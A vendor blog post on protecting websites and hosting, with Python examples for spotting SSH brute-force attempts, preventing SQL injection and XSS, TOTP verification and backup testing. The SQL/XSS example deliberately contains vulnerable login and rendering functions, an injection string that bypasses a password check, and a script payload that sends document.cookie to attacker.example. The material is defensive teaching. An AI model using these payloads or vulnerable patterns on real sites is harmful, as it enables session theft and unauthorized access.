DEV Community

ispmanager.com for Ispmanager

How to protect your website and hosting from cyberattacks — recommendations and turn-key solutions for project security

In 2018 it came to light that Cambridge Analytica had harvested the personal data of up to 87 million Facebook users through a third-party quiz app that used Facebook's platform permissions to collect data not only from the people who installed it, but also from their friends. The data was used for targeted political advertising during the 2016 US presidential election, causing widespread public outcry and, among other consequences, a $5 billion FTC fine for Facebook in 2019.

According to Check Point Research, the number of cyberattacks in the second quarter of 2024 increased by 30% compared to the same quarter of 2023. In this article, we describe the ways attackers most often try to compromise companies and how to avoid it.

Here’s a checklist of the most important things for website and hosting security in case you don't have time to read the whole thing.

Checklist: the key points for site and hosting security

Never neglect information security, even if you only have a small site. Large organizations have strengthened their defences and are harder to hack, so attackers increasingly turn to smaller targets: even a small company can become a victim.

Train your team on the basics of information security - in 2023, a study by Webinarcare found that 95% of cyberattacks globally are due to human error. Your employees have to know how to properly respond to phishing, what kind of passwords to set and how to store them, and how to properly send and receive information. Train them by describing and showing examples, test them not just as a formality, and make anyone who fails retake the course.

Update your software regularly: outdated software contains publicly known vulnerabilities, and attackers scan for exactly those. Ideally, use solutions that are regularly updated and supported by their vendors.

Use password managers and multi-factor authentication to protect account access. For example, password managers like KeePass or Bitwarden and authenticator apps like Google Authenticator.

Install an SSL/TLS certificate so that data between the browser and your server is encrypted in transit. For a small project a free Let's Encrypt certificate is enough; it provides the same encryption as a paid one. Paid certificates differ in the level of organisation validation and the warranty they come with, which matters for medium and large commercial projects.

Choose turn-key solutions to protect your server from the main types of attacks — for example, security modules or all-in-one solutions. Learn more about site and server protection options in the ispmanager blog →

What is attacked most often and how — from cracking passwords to code vulnerabilities

Hackers are constantly looking for new targets. For example, the level of protection in the financial sector has become so high that criminals are turning their attention to other sectors, so even a very small organization can be the target of a cyberattack.

Hackers most often attack:

  • Servers: trying to gain access to the server and its accounts, or to take the server down.
  • Vulnerabilities in code and applications — looking for weaknesses through which to gain access to data and software.
  • Data that is transferred between a user and a server — users leave personal information, card numbers, and other data that fraudsters can exploit.

Next, let's go over each target and attack variant in detail.

Server access: attackers try to gain unauthorized access to the site's server or control panel. The goal is to take control of the server and the site, take over its accounts, or take the server down.

According to Webinarcare, 95% of cyberattacks worldwide are caused by the human factor - for example, employees clicking unsafe links from fraudsters or giving passwords to third parties.

The methods fraudsters use against servers include:

  • Brute-force attacks: attackers guess account passwords by trying many combinations, often from lists of leaked or common passwords. If the password is weak, they get in quickly.
  • Weak access rights: poorly configured permissions allow attackers to perform actions they should not be able to perform.
  • DDoS attacks: the site receives a flood of requests and "goes down" due to overload. This is an attack on availability rather than a way in.
  • Malware and viruses: malicious code on the server can slow it down, delete files, or block access to important features.
  • Phishing: users are sent links to fake login pages and the attackers steal the credentials they enter.
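Brute-force attempts leave a clear trace in the server's authentication log. The following is an added example (not part of the original article, and not ispmanager's code) of the detection logic a tool like fail2ban applies: parse sshd lines from /var/log/auth.log, count failed logins per source IP in a sliding window, and flag sources that exceed a threshold. The log lines, host name, IP addresses and the year are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the format OpenSSH writes to /var/log/auth.log (syslog lines
# carry no year, so the parser takes one as a parameter). IPs are from documentation ranges.
SAMPLE_AUTH_LOG = """\
Mar 10 08:01:02 web01 sshd[2210]: Failed password for root from 203.0.113.7 port 51122 ssh2
Mar 10 08:01:04 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51130 ssh2
Mar 10 08:01:05 web01 sshd[2212]: Failed password for invalid user admin from 203.0.113.7 port 51131 ssh2
Mar 10 08:01:07 web01 sshd[2213]: Failed password for invalid user oracle from 203.0.113.7 port 51140 ssh2
Mar 10 08:01:09 web01 sshd[2214]: Failed password for root from 203.0.113.7 port 51150 ssh2
Mar 10 08:01:30 web01 sshd[2215]: Accepted publickey for deploy from 198.51.100.23 port 40010 ssh2
Mar 10 08:15:00 web01 sshd[2230]: Failed password for alice from 198.51.100.23 port 40022 ssh2
Mar 10 08:15:20 web01 sshd[2231]: Accepted password for alice from 198.51.100.23 port 40023 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2024):
    """Return a dict for an sshd auth line, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def find_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag source IPs with at least `threshold` failed logins inside any `window`.
    Returns {ip: (failures_in_busiest_window, sorted usernames tried in that window)}."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["result"] == "Failed":
            failures[ev["ip"]].append(ev)

    flagged = {}
    for ip, events in failures.items():
        events.sort(key=lambda e: e["ts"])
        best, best_users, start = 0, [], 0
        for end in range(len(events)):            # sliding window over the sorted failures
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count > best:
                best = count
                best_users = sorted({e["user"] for e in events[start:end + 1]})
        if best >= threshold:
            flagged[ip] = (best, best_users)
    return flagged


if __name__ == "__main__":
    for ip, (count, users) in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {count} failures within one minute, users tried: {', '.join(users)}")
```

On the constructed log, 203.0.113.7 is flagged (five failures in seven seconds across root, admin and oracle), while alice's single typo from 198.51.100.23 is not. In production the flagged IPs would be fed to a firewall rule with an expiry, which is exactly what fail2ban automates; the threshold and window are the knobs that trade false positives against how many guesses an attacker gets.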

Code and application vulnerabilities — attackers exploit weaknesses in website software, such as the CMS or plugins to inject malicious code or gain access to data.

Ways fraudsters can find weaknesses in code and applications:

  • SQL injection: attackers enter SQL fragments into input fields (search boxes, login forms, URL parameters) that the application pastes straight into a database query, allowing them to read or modify the database.
  • Cross-site scripting (XSS): malicious scripts are injected into pages served by the site and run in other users' browsers, where they can steal sessions or deface content.
  • Looking for vulnerabilities in the CMS and plugins: outdated or insecure versions may contain publicly known bugs that are easy to exploit.
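To make the first two items concrete, here is an added example (not code from the original article or from any CMS) showing the vulnerable pattern next to its fix for both SQL injection and stored XSS. It uses an in-memory SQLite table with constructed users and constructed attack inputs; the table layout, user names and hash strings are assumptions for the demo.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for a CMS database (example data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("admin", "hash-of-admin-pw", "administrator"), ("alice", "hash-of-alice-pw", "editor")],
    )
    return conn


def login_vulnerable(conn, username, password_hash):
    """Builds the query by string formatting: user input becomes part of the SQL itself."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password_hash):
    """Parameterised query: the driver binds the values as data, so quotes and comment
    markers in the input can never change the structure of the statement."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()


def render_comment_vulnerable(author, body):
    """Interpolates untrusted text into HTML as-is, so a <script> tag left in a comment runs
    in every visitor's browser (stored XSS)."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author, body):
    """Escapes <, >, &, and quotes before inserting text into HTML; the payload is shown, not run."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


# Constructed attack inputs
SQLI_USERNAME = "admin' --"   # closes the quote, then "--" comments out the password check
XSS_BODY = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_USERNAME, "wrong"))  # ('admin', 'administrator')
    print("safe login:      ", login_safe(db, SQLI_USERNAME, "wrong"))        # None
    print(render_comment_vulnerable("bob", XSS_BODY))
    print(render_comment_safe("bob", XSS_BODY))
```

With the injected username the formatted query becomes `... WHERE username = 'admin' --' AND password_hash = 'wrong'`; everything after `--` is a comment, so the password check disappears and the attacker is logged in as the administrator. The parameterised version looks for a user literally named `admin' --` and finds nothing. The same rule applies to HTML output: escape at the point where untrusted text meets the page, regardless of any WAF sitting in front.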

Threats related to data transfer — concerns the interception of data between users and the server. Most often, data is stolen over unencrypted connections - if a site does not use HTTPS, data is transmitted openly and can be easily intercepted.

Possible consequences of the attacks listed above:

  • Penalties for leaking sensitive data: for example, the EU's General Data Protection Regulation (GDPR) provides for fines of up to €10 million or 2% of annual worldwide turnover, and up to €20 million or 4% for the most serious infringements, whichever amount is higher.
  • Loss of traffic — the site may drop in the search results.
  • Hacking into the admin panel.
  • Infection of the site with viruses.

Tesla, for example, has repeatedly been in the news for security issues. In 2022, 19-year-old David Colombo found that publicly exposed, poorly configured installations of TeslaMate, a third-party open-source tool that owners use to log data about their cars, leaked the owners' Tesla API credentials. Using them, he could remotely reach more than 25 Tesla vehicles in 13 countries: open doors and windows, honk the horn, and enable keyless driving. The flaw lay in how users had deployed the third-party software, not in Tesla's own systems. Colombo reported the issue to the Tesla security team and the TeslaMate developers.

8 ways to protect your website and hosting to prevent a cyberattack

It is important to regularly improve your company's information security system without waiting for a cyberattack to occur. Even if you have a small website or business, we recommend the following methods of defense:

Train your team in the rules of information security — in the previous section, we noted that, in most cases, cyberattacks occur due to human error. Therefore, it is important to train employees on how to properly handle sensitive data and basic information security rules. For example, do not click on links from unknown sources and do not download files from dubious links.

Conduct training and test your employees not just as a formality but to really test their knowledge of the rules. Even better, show real-life examples of the tricks fraudsters use and what the consequences can be.

A company's infrastructure can get hacked starting with its employees' personal accounts. For example, fraudsters can send phishing links over social networks under the guise of offering a subscription to a service. If an employee clicks the link and enters credentials, the fraudster may gain access to the corporate system.

Install an SSL/TLS certificate: with a certificate in place the site serves its pages over HTTPS, and the connection between the user and the server is encrypted and authenticated. Passwords, credit card numbers, and other personal information that users enter on the site cannot be read or modified by someone sitting between the browser and the server. Note that this protects data in transit only; a certificate does nothing against an attacker who has already compromised the server.

SSL certificates can be obtained through a hosting provider or from a certificate authority. Many hosting companies and control panels offer free SSL certificates such as those from Let's Encrypt.
We recommend a free Let's Encrypt certificate for small projects and, for commercial sites, paid SSL certificates that include a warranty in case of a breach. Which SSL certificate to choose and whether you can do without one →

Regularly update your CMS and plugins: outdated software often contains vulnerabilities that attackers exploit. Modern CMSs like WordPress, Joomla, and others regularly release updates that fix such vulnerabilities.

In the ispmanager control panel, you can set up automatic updates for your CMS and plugins. This is especially important for sites that run on popular CMSs such as WordPress which are often the targets of cyberattacks.

Protect your passwords. Simple passwords are easy to crack by brute force, so it's important to use long, unique passwords and additional protection. Writing passwords on a piece of paper and keeping it under your keyboard is not the best idea =)

Use password managers such as KeePass or Bitwarden. Password managers can help you generate complex ones and store them securely.

For example, in 2020, Zoom faced the problem of so-called "Zoom-bombing": uninvited participants joining video conferences whose meeting IDs had been guessed or shared. After a series of incidents, the company made comprehensive changes to its security, including meeting passcodes and waiting rooms enabled by default and, later, end-to-end encryption.

Enable multi-factor authentication (MFA). MFA requires you to prove your identity with two or more factors of different types: something you know (a password), something you have (a one-time code from an authenticator app or a hardware key), or something you are (a fingerprint or face). For the second factor, you can use an authenticator app such as Google Authenticator. A secret question is another "something you know" and does not count as a separate factor.

Enable MFA for all site administrators. Use MFA in systems where maximum data protection is needed and the cost of data leakage would be high.
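The six-digit codes that authenticator apps show are time-based one-time passwords (TOTP, RFC 6238). The following is an added example, not code from the original article or from ispmanager, of what happens on both sides: generating and provisioning a secret, computing the code the app shows, and verifying it on the server with clock-drift tolerance and replay protection. The issuer and account names in the demo are assumptions; the test vector used in the check is the one published in RFC 6238.

```python
import base64
import hashlib
import hmac
import secrets
import struct
import time
from urllib.parse import quote


def generate_secret(nbytes=20):
    """Random 160-bit seed, base32-encoded as authenticator apps expect it."""
    return base64.b32encode(secrets.token_bytes(nbytes)).decode("ascii").rstrip("=")


def provisioning_uri(secret_b32, account, issuer):
    """otpauth:// URI that a control panel would show as a QR code for the user to scan."""
    return (f"otpauth://totp/{quote(issuer)}:{quote(account)}"
            f"?secret={secret_b32}&issuer={quote(issuer)}&algorithm=SHA1&digits=6&period=30")


def hotp(secret_b32, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    padded = secret_b32 + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded, casefold=True)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32, timestamp=None, step=30, digits=6):
    """RFC 6238: the HOTP counter is the number of `step`-second intervals since the Unix epoch."""
    if timestamp is None:
        timestamp = time.time()
    return hotp(secret_b32, int(timestamp // step), digits)


def verify_totp(secret_b32, submitted, timestamp=None, step=30, window=1, digits=6,
                last_used_counter=None):
    """Server-side check. Accepts the code for the current step and +/- `window` neighbouring
    steps to tolerate clock drift, compares in constant time, and refuses any counter that is
    not newer than the last one accepted, so an intercepted code cannot be replayed.
    Returns the matched counter (persist it as last_used_counter) or None."""
    if timestamp is None:
        timestamp = time.time()
    counter = int(timestamp // step)
    for delta in range(-window, window + 1):
        candidate = counter + delta
        if last_used_counter is not None and candidate <= last_used_counter:
            continue
        if hmac.compare_digest(hotp(secret_b32, candidate, digits).encode(), submitted.encode()):
            return candidate
    return None


if __name__ == "__main__":
    secret = generate_secret()
    print(provisioning_uri(secret, "admin@example.com", "ispmanager-demo"))  # assumed names
    code = totp(secret)
    print("current code:", code, "-> accepted at counter", verify_totp(secret, code))
```

Two details matter in practice: the shared secret is as sensitive as a password and must be stored protected on the server, and the last accepted counter has to be persisted per user, otherwise a code phished seconds ago is still valid for the rest of its 30-second window.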

Control access rights — assign access rights ensuring that each user can use only those services and data that are necessary for his/her work. In this case, even if an employee is compromised, the attacker will only have access to a limited part of the information infrastructure and the damage will be minimal.

In most CMSs, you can assign roles to users, for example, editor, administrator, and author. You can also restrict access by IP or geographic location.

Conduct a user audit and assign each employee only the rights they need. Regularly check and remove access from employees who are no longer working with the project.

Install DDoS protection: DDoS protection solutions filter malicious traffic, take the load off the server, and let legitimate users through to the site. DDoS protection can be configured using off-the-shelf solutions like the DDoS-Guard protection module →

In 2023, for example, Kaspersky Lab prevented one of the largest DDoS attacks on the Russian financial sector. The company used its own solutions and was able to repel the attack, which targeted bank servers, ensuring uninterrupted operation of online services and the security of customer data.

Configure a WAF (web application firewall), which protects against SQL injection and cross-site scripting (XSS), attacks that can lead to data leakage or infection of the site. A WAF analyzes incoming HTTP traffic, filters suspicious requests, and blocks them. Keep in mind that a WAF is a safety net, not a substitute for fixing vulnerable code. Many WAFs are available in off-the-shelf solutions like BitNinja or ModSecurity. How will BitNinja protect your site and server? Find out in the ispmanager blog →

Make regular backups of your site and databases: backups let you recover from attacks, crashes, or accidental errors and get your system back up and running. Use built-in hosting solutions or external services to automate backups, keep at least one copy off the server itself (an attacker who controls the server can delete backups stored on it), and regularly test that a backup can actually be restored. For example, you can set up automatic backups on a schedule in the ispmanager control panel. How to backup your site in ispmanager →
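A backup that has never been restored is a hope, not a backup. The following is an added example (not part of the original article and not ispmanager's backup code) of the two halves a practitioner wants: packing a site directory into a tar.gz with a SHA-256 manifest, and a restore test that unpacks the archive into a scratch directory and checks every file against the manifest. The mini WordPress-style site it creates is constructed for the demo.

```python
import hashlib
import json
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def create_backup(site_dir, backup_path):
    """Pack every file under site_dir into a .tar.gz and write a manifest of SHA-256 hashes
    next to it. Returns the manifest (relative path -> hash)."""
    site_dir = Path(site_dir)
    manifest = {}
    with tarfile.open(str(backup_path), "w:gz") as tar:
        for p in sorted(site_dir.rglob("*")):
            if p.is_file():
                rel = p.relative_to(site_dir).as_posix()
                manifest[rel] = sha256_file(p)
                tar.add(str(p), arcname=rel)
    Path(str(backup_path) + ".sha256.json").write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return manifest


def verify_restore(backup_path, manifest_path):
    """Restore the archive into a scratch directory and compare each file with the manifest.
    Returns a list of problems; an empty list means the backup restores cleanly."""
    manifest = json.loads(Path(manifest_path).read_text())
    problems = []
    with tempfile.TemporaryDirectory() as scratch:
        with tarfile.open(str(backup_path), "r:gz") as tar:
            try:
                # "data" filter refuses entries that would escape the target dir (Python 3.12+ and backports)
                tar.extractall(scratch, filter="data")
            except TypeError:
                tar.extractall(scratch)  # older interpreters without the filter argument
        for rel, expected in manifest.items():
            restored = Path(scratch) / rel
            if not restored.is_file():
                problems.append(f"missing: {rel}")
            elif sha256_file(restored) != expected:
                problems.append(f"hash mismatch: {rel}")
    return problems


def demo():
    """Build a constructed mini site, back it up, verify the restore, then tamper with the
    manifest to show that a bad backup is reported instead of silently accepted."""
    with tempfile.TemporaryDirectory() as work:
        site = Path(work) / "site"
        (site / "wp-content" / "uploads").mkdir(parents=True)
        (site / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (site / "wp-config.php").write_text("<?php define('DB_NAME', 'wp'); ?>\n")
        (site / "wp-content" / "uploads" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n constructed")
        backup = Path(work) / "site-backup.tar.gz"
        manifest_path = str(backup) + ".sha256.json"

        manifest = create_backup(site, backup)
        clean = verify_restore(backup, manifest_path)

        tampered = dict(manifest)
        tampered["index.php"] = "0" * 64   # pretend the archived file no longer matches
        Path(manifest_path).write_text(json.dumps(tampered))
        bad = verify_restore(backup, manifest_path)
        return len(manifest), clean, bad


if __name__ == "__main__":
    n, clean, bad = demo()
    print(f"{n} files backed up; clean restore problems: {clean}; tampered restore problems: {bad}")
```

In a real deployment the database dump (for example the output of mysqldump) goes into the same archive, the archive and its manifest are copied off-host, and `verify_restore` runs on a schedule against the off-host copy so that a silently corrupted or truncated backup is noticed before the day you need it.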

Turn-key solutions to protect your website and hosting from cyberattacks

There are dozens of turn-key solutions on the market. Let's briefly go over the most popular ones, their functionality, and cost.

[Comparison table of turn-key protection solutions, their functionality, and cost: shown as an image in the original]

This article was originally published on the ispmanager blog
